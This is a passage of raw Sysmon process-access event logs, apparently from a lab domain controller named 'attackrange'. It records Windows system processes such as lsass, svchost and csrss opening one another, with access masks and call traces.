C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.843","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3720,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.843\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.843","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3721,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.859\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.859","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3722,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.859\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.859","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3723,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.859\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.859","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3724,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.859\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.859","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3725,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 1608\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"1608","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3726,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.875\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.875","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3727,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.875\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+